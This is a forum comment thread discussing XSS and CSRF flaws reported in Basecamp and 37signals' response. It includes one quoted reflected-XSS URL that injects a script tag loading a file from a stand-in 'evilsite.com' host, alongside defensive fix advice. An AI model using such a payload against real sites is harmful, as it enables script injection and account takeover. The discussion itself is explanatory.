What's visible of the "evil" URL, at 1:52, looks like: http;//andyet.basecamphq.com/search?global=true&scope=all&terms=%3Cscript+src%3d%22http;//evilsite.com/evil.js... (: replaced with ; so news.YC doesn't shorten link)
This is a lack of filtering of a search input on the search page, not the bug they submitted - that one included injecting HTML/JS by logged in users onto "internal" pages. Conflating the two is disingenuous, at best.
Good news is that a fix for this vulnerability -filtering the search box's inputs- will take about 30 seconds for someone familiar with the code base and ~5 minutes for a brand new intern.
it will fix that one particular blind xss vulnerability, but from 37signals' response ("[their] users find great value in it") it sounds like they are allowing arbitrary html and javascript to be run everywhere else on the site.
other vulnerabilities would probably require that one has a basecamp account to be able to post messages to the site or something, but they allow privilege escalation and need to be fixed just the same.
37signals' response that users should be trusted is just stupid. think of a customer logging into their vendor's basecamp site, being able to take over the vendor's account and then see all of their other customers.
users (and their input) should never be trusted. even if you trust the users, you can't always guarantee that the trusted user is the one in control of their web browser.
think of a customer logging into their vendor's basecamp site, being able to take over the vendor's account and then see all of their other customers.
Sounds like a customer I don't want. Money is great and all, but if a customer is going to hack my Basecamp account, then I don't want to work for them anymore.
I don't think "your users should be trusted" is a ridiculous way to look at things. Technology can't solve some problems.
Yeah... from personal experience, if an app is intentionally or unintentionally built without XSS or CSRF protection, a complete fix-up of a codebase as large as Basecamp is pretty expensive. Granted there are solutions that take care of 99% of the vulnerabilities, but the amount of testing/debugging/coding to close that 1% gap is huge.
Especially when you're still required to churn out new features in parallel.
Fixing CSRF is pretty formulaic. You can probably do it across your whole codebase using nothing but sed. Stick a copy of your session cookie as a hidden field in every HTML form, and validate it as the first step of every form processing routine. The only time you need to introduce anything more thoughtful is if in some cases cross-site requests really are a feature, e.g. API calls.
This is a lack of filtering of a search input on the search page, not the bug they submitted - that one included injecting HTML/JS by logged in users onto "internal" pages. Conflating the two is disingenuous, at best.
Good news is that a fix for this vulnerability -filtering the search box's inputs- will take about 30 seconds for someone familiar with the code base and ~5 minutes for a brand new intern.